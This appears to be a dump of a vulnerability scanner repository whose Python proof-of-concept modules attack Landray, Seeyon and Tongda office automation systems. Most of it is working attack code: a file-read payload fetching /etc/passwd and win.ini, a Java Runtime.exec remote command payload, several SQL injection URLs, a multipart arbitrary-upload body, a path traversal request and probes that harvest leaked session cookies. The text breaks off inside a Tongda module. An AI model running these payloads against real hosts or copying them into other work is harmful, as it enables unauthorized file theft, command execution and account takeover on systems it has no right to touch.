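    """Probe a Landray OA host for the ``custom.jsp`` arbitrary file read.

    Flow:
      1. A GET (carrying the same ``var`` body, as in the original) is used as
         a fingerprint; only an HTTP 500 whose text mentions
         ``/sys/ui/extend/`` is probed further.
      2. A POST asks for ``file:///etc/passwd``; a 200 reply matching
         ``root:.*:0:0`` flags the target with ``os`` = ``linux``.
      3. Only if that did not hit, a POST asks for ``file:///c://windows/win.ini``;
         a 200 reply containing ``for 16-bit app support`` flags the target
         with ``os`` = ``windows``.

    Fixes against the original: the Windows marker was searched in the
    *Linux* reply (``rep1.text`` instead of ``rep2.text``), and the Windows
    probe was sent even after the Linux one had already confirmed.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was a hard-coded local).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``os`` and ``vurl`` are
        added only when the target is flagged.
    """
    result = {
        'name': '蓝凌OA custom.jsp 任意文件读取漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, '/sys/ui/extend/varkind/custom.jsp')
    data = 'var={"body":{"file":"file:///etc/passwd"}}'
    data2 = 'var={"body":{"file":"file:///c://windows/win.ini"}}'
    try:
        # verify=False (kept from the original) disables TLS certificate
        # checking so self-signed targets can be scanned.
        finger_rep = requests.get(vurl, headers=headers, verify=False, timeout=timeout, data=data)
        if not (re.search('/sys/ui/extend/', finger_rep.text) and finger_rep.status_code == 500):
            return result

        rep1 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=data)
        if rep1.status_code == 200 and re.search('root:.*:0:0', rep1.text):
            result['vulnerable'] = True
            result['os'] = 'linux'
            result['vurl'] = vurl
            return result

        # Linux probe did not hit: try the Windows marker, in *its own* reply.
        rep2 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=data2)
        if rep2.status_code == 200 and re.search('for 16-bit app support', rep2.text):
            result['vulnerable'] = True
            result['os'] = 'windows'
            result['vurl'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result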
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_oa_treexml_rce_2022.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
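def verify(url, timeout=5):
    """Probe a Landray OA host at ``/data/sys-common/treexml.tmpl``.

    Flow:
      1. An empty POST fingerprints the endpoint; only a reply containing
         ``参数s_bean不能为空`` is probed further.
      2. The fixed ``payload_data`` form (unchanged from the original) is
         POSTed; an HTTP 200 reply containing
         ``公式运行时返回了空值,所以无法校验返回值类型`` flags the target.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was a hard-coded local).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``vurl`` is added only
        when the target is flagged.
    """
    result = {
        'name': '蓝凌OA 未授权RCE(2022HVV)',
        'vulnerable': False,
        'url': url,
    }
    cmd = 'whoami'
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ",
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    payload = '/data/sys-common/treexml.tmpl'
    vurl = urllib.parse.urljoin(url, payload)
    # Kept byte-for-byte from the original; the embedded newlines are part
    # of the form value that is sent.
    payload_data = '''s_bean=ruleFormulaValidate&script=try {
String cmd = "%s";
Process child = Runtime.getRuntime().exec(cmd);
} catch (IOException e) {
System.err.println(e);
}''' % cmd
    try:
        # verify=False (kept from the original) disables TLS certificate
        # checking so self-signed targets can be scanned.
        finger_rep = requests.post(vurl, headers=headers, timeout=timeout, verify=False)
        if re.search('参数s_bean不能为空', finger_rep.text):
            rep = requests.post(vurl, headers=headers, timeout=timeout, verify=False, data=payload_data)
            if re.search('公式运行时返回了空值,所以无法校验返回值类型', rep.text) and rep.status_code == 200:
                result['vulnerable'] = True
                result['vurl'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result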
34 |
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_sysUiComponent_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
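def verify(url, timeout=5):
    """Check whether a Landray OA host exposes ``sysUiComponent.do?method=upload``.

    One GET is sent to the upload action. The target is flagged when the
    reply is HTTP 200 and contains ``部件包``, i.e. the upload page is served
    without the request having authenticated.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was the literal ``5``).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '蓝凌OAsysUiComponent 文件存在任意文件上传漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close',
    }
    vurl = urllib.parse.urljoin(url, "/sys/ui/sys_ui_component/sysUiComponent.do?method=upload")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 200 and '部件包' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result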
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-ShowUserInfo-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
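def verify(url, timeout=5):
    """Probe a Landray EIS host for the ``ShowUserInfo.aspx`` SQL injection.

    One GET is sent to ``/third/DingTalk/Demo/ShowUserInfo.aspx`` with the
    fixed ``account`` query string below. The target is flagged only when
    the server answers HTTP 500 and the body contains ``Microsoft``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (the original had none, so a
            silent host could stall the scan).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '蓝凌EIS智慧协同平台ShowUserInfo.aspx接口SQL注入',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Accept': 'image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
        'Connection': 'close',
    }
    vurl = urllib.parse.urljoin(url, "/third/DingTalk/Demo/ShowUserInfo.aspx?account=1'%20and%201=@@version--+")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 500 and 'Microsoft' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result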
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-UniformEntry-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
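def verify(url, timeout=5):
    """Probe a Landray EIS host for the ``UniformEntry.aspx`` SQL injection.

    One GET is sent to ``/third/DingTalk/Pages/UniformEntry.aspx`` with the
    fixed ``moduleid`` query string below. The target is flagged only when
    the server answers HTTP 500 and the body contains ``Microsoft``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (the original had none).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '蓝凌EIS智慧协同平台UniformEntry.aspx接口SQL注入',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Accept': 'image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
        'Connection': 'close',
    }
    vurl = urllib.parse.urljoin(url, "/third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version--+")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 500 and 'Microsoft' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result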
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-fl_define_flow_chart_show-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
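def verify(url, timeout=5):
    """Probe a Landray EIS host for the ``fl_define_flow_chart_show.aspx`` SQL injection.

    One GET is sent to ``/flow/fl_define_flow_chart_show.aspx`` with the
    fixed ``id`` query string below. The target is flagged only when the
    server answers HTTP 500 and the body contains ``Microsoft``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (the original had none).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx接口SQL注入',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
        'Connection': 'close',
    }
    vurl = urllib.parse.urljoin(url, "/flow/fl_define_flow_chart_show.aspx?id=1%20and%201=@@version--+")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 500 and 'Microsoft' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result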
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-frm_form_list_main-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
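def verify(url, timeout=5):
    """Probe a Landray EIS host for the ``frm_form_list_main.aspx`` SQL injection.

    One GET is sent to ``/frm/frm_form_list_main.aspx`` with the fixed
    ``list_id`` query string below. The target is flagged only when the
    server answers HTTP 500 and the body contains ``Microsoft``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (the original had none).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '蓝凌EIS智慧协同平台frm_form_list_main.aspx接口SQL注入',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
        'Connection': 'close',
    }
    vurl = urllib.parse.urljoin(url, "/frm/frm_form_list_main.aspx?list_id=1%20and%201=@@version--+")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 500 and 'Microsoft' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result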
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-saveImg-fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
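def verify(url, timeout=5):
    """Probe a Landray EIS host at ``/eis/service/api.aspx?action=saveImg``.

    A hand-built multipart body (kept byte-for-byte from the original; the
    boundary in the ``Content-Type`` header must keep matching it) is POSTed.
    The target is flagged only when the reply is HTTP 200 and contains
    ``editor_img``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (the original had none).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close',
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu',
    }
    # Body is sent verbatim (the blank line and line breaks are part of it).
    data = '''------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="hello.txt"
Content-Type: text/html

hellohello
------WebKitFormBoundaryxdgaqmqu--'''
    vurl = urllib.parse.urljoin(url, "/eis/service/api.aspx?action=saveImg")
    try:
        response = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        if response.status_code == 200 and 'editor_img' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result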
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry_oa_sysUiExtend_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
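def verify(url, timeout=5):
    """Check whether a Landray EKP host serves ``sysUiExtend.do?method=upload`` unauthenticated.

    One GET is sent to ``/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload``
    (the repeated slashes are part of the probe and are kept as-is). The
    target is flagged when the reply is HTTP 200 and contains ``主题包``. The
    ``name`` itself is prefixed ``可能存在`` ("possibly present"): this is a
    page-exposure check, not a confirmed upload.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (the original had none).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '可能存在:蓝凌EKP sysUiExtend.do前台授权绕过导致文件上传',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close',
    }
    vurl = urllib.parse.urljoin(url, "/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 200 and '主题包' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result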
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_a6_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_a6_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_get_sessionslist.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_get_sessionslist.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_oa_a8_htmlofficeservlet_getshell.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_oa_a8_htmlofficeservlet_getshell.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_oa_ajaxdo_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_oa_ajaxdo_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_oa_wpsassistservlet_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_oa_wpsassistservlet_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_thirdpartycontroller_getshell.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_thirdpartycontroller_getshell.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/seeyon_a6_sqli.py:
--------------------------------------------------------------------------------
1 | import re, requests
2 | import urllib
3 |
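def verify(url, timeout=2):
    """Probe a Seeyon OA A6 host for SQL injection across five known paths.

    Each path in ``payloads`` is requested with a GET in turn. The target is
    flagged, and the loop stops, at the first reply whose body contains the
    MD5 of ``1234`` (``81dc9bdb52d04dc20036dbd8313ed055``) or its middle
    fragment ``52d04dc20036dbd8``.

    The original wrapped the whole loop in a second, outer ``try`` whose only
    reachable exceptions were already handled per path; it is dropped here.

    Args:
        url: Base URL of the target; each probe path is joined onto it.
        timeout: Per-request timeout in seconds (was the literal ``2``).

    Returns:
        dict with ``name`` and ``vulnerable``; ``url`` and ``payload`` (the
        URL that matched) are added only when the target is flagged.
    """
    result = {
        'name': '致远OA A6 sql注入漏洞',
        'vulnerable': False,
    }
    payloads = [
        '/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5(1234),1%23',
        '/common/js/menu/test.jsp?doType=101&S1=SeLeCt%20Md5(1234)',
        '/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27AnD%20(SeLeCt%201%20FrOm%20(SeLeCt%20CoUnT(*),CoNcaT(Md5(1234),FlOoR(RaNd(0)*2))x%20FrOm%20InFoRmAtIoN_ScHeMa.TaBlEs%20GrOuP%20By%20x)a)%23',
        "/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1'UnIoN%20AlL%20SeLeCt%20NULL,Md5(1234),NULL,NULL%23",
        '/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20AnD%201=2%20UnIon%20SeLeCt%20Md5(1234)%20--',
    ]
    for payload in payloads:
        try:
            vurl = urllib.parse.urljoin(url, payload)
            req = requests.get(vurl, timeout=timeout)
            if re.search('81dc9bdb52d04dc20036dbd8313ed055', req.text) or re.search('52d04dc20036dbd8', req.text):
                result['vulnerable'] = True
                result['url'] = url
                result['payload'] = vurl
                return result
        except Exception:
            # One unreachable or failing path must not stop the remaining
            # probes; narrowed from a bare ``except:`` so Ctrl-C still works.
            continue
    return result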
31 |
32 |
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/seeyon_get_sessionslist.py:
--------------------------------------------------------------------------------
1 | import requests,re
2 | import urllib
3 |
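def verify(url, timeout=3):
    """Check whether a Seeyon OA host exposes session ids via ``getSessionList.jsp``.

    One GET is sent to ``/yyoa/ext/https/getSessionList.jsp?cmd=getAll``. The
    target is flagged when the reply is HTTP 200 and contains a 32-character
    run of ``[0-9A-Z]`` (the shape of a listed session id).

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was a hard-coded local).

    Returns:
        dict with ``name``, ``url`` and ``vulnerable``; ``vurl`` is added only
        when the target is flagged.
    """
    result = {
        'name': '致远OA Session泄漏漏洞(后台可getshell)',
        'url': url,
        'vulnerable': False,
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    payload = '/yyoa/ext/https/getSessionList.jsp?cmd=getAll'
    vurl = urllib.parse.urljoin(url, payload)
    try:
        req = requests.get(vurl, headers=headers, timeout=timeout)
        if req.status_code == 200 and re.search('[0-9A-Z]{32}', req.text):
            result['vulnerable'] = True
            result['vurl'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result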
24 |
25 |
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/seeyon_oa_a8_htmlofficeservlet_getshell.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import urllib
4 |
5 |
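def verify(url, timeout=3):
    """Check whether a Seeyon OA A8 host exposes ``/seeyon/htmlofficeservlet``.

    One GET is sent to the servlet. The target is flagged when the body
    contains both ``DBSTEP`` and ``htmoffice``; the status code is not
    inspected (as in the original).

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was the literal ``3``).

    Returns:
        dict with ``name`` and ``vulnerable``; ``url`` and ``payload`` (the
        probed URL) are added only when the target is flagged.
    """
    result = {
        'name': '致远 OA A8 htmlofficeservlet getshell 漏洞',
        'vulnerable': False,
    }
    payload = '/seeyon/htmlofficeservlet'
    try:
        vurl = urllib.parse.urljoin(url, payload)
        req = requests.get(vurl, timeout=timeout)
        if re.search('DBSTEP', req.text) and re.search('htmoffice', req.text):
            result['vulnerable'] = True
            result['url'] = url
            result['payload'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result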
22 |
23 |
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/seeyon_thirdpartycontroller_getshell.py:
--------------------------------------------------------------------------------
1 | import requests,re
2 | import urllib
3 |
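def verify(url, timeout=3):
    """Check whether a Seeyon OA host hands out a session via ``thirdpartyController.do``.

    The fixed form in ``data`` is POSTed to ``/seeyon/thirdpartyController.do``.
    The target is flagged when the reply is HTTP 200 and its ``Set-Cookie``
    header mentions both ``seeyon`` and ``JSESSIONID``.

    Fix against the original: ``req.headers['Set-Cookie']`` raised KeyError
    whenever the header was absent, which the bare ``except:`` then hid;
    ``.get('Set-Cookie', '')`` makes "no cookie" an ordinary negative.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was a hard-coded local).

    Returns:
        dict with ``name``, ``url`` and ``vulnerable``; ``vurl`` is added only
        when the target is flagged.
    """
    result = {
        'name': '致远OA Session泄露(thirdpartyController.do)',
        'url': url,
        'vulnerable': False,
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    payload = '/seeyon/thirdpartyController.do'
    data = 'method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1'
    vurl = urllib.parse.urljoin(url, payload)
    try:
        # verify=False (kept from the original) disables TLS certificate
        # checking so self-signed targets can be scanned.
        req = requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False)
        set_cookie = req.headers.get('Set-Cookie', '')
        if req.status_code == 200 and re.search('seeyon', set_cookie) and re.search('JSESSIONID', set_cookie):
            result['vulnerable'] = True
            result['vurl'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result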
25 |
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_down_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_down_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_getdata_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_getdata_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_2016_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_2016_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_fake_user.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_fake_user.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_fileinclude_2020.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_fileinclude_2020.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_qyapp-vote-submit_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_qyapp-vote-submit_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_v11-8_apialiphp_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_v11-8_apialiphp_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_sqli_getdata_php.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_sqli_getdata_php.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_videofile_fileread.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_videofile_fileread.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_down_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
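def verify(url, timeout=5):
    """Check whether a Tongda OA host serves ``/inc/package/down.php`` without auth.

    One GET is sent with the fixed ``id`` query string below. The target is
    flagged when the reply is HTTP 200 and its ``Content-Length`` header is
    greater than 1000; a missing header counts as 0 and is therefore a
    negative, and a non-numeric header value ends up in the failure path.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was the literal ``5``).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '通达OA down.php接口存在未授权访问漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept': '*/*',
        'Connection': 'Keep-Alive',
    }
    vurl = urllib.parse.urljoin(url, "/inc/package/down.php?id=../../../cache/org")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        content_length = int(response.headers.get('Content-Length', 0))
        if response.status_code == 200 and content_length > 1000:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures (and an unparsable Content-Length) mean "not
        # confirmed"; narrowed from a bare ``except:`` so Ctrl-C still works.
        return result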
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_getdata_rce.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
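def verify(url, timeout=5):
    """Probe a Tongda OA v11.9 host at ``/general/appbuilder/web/portal/gateway/getdata``.

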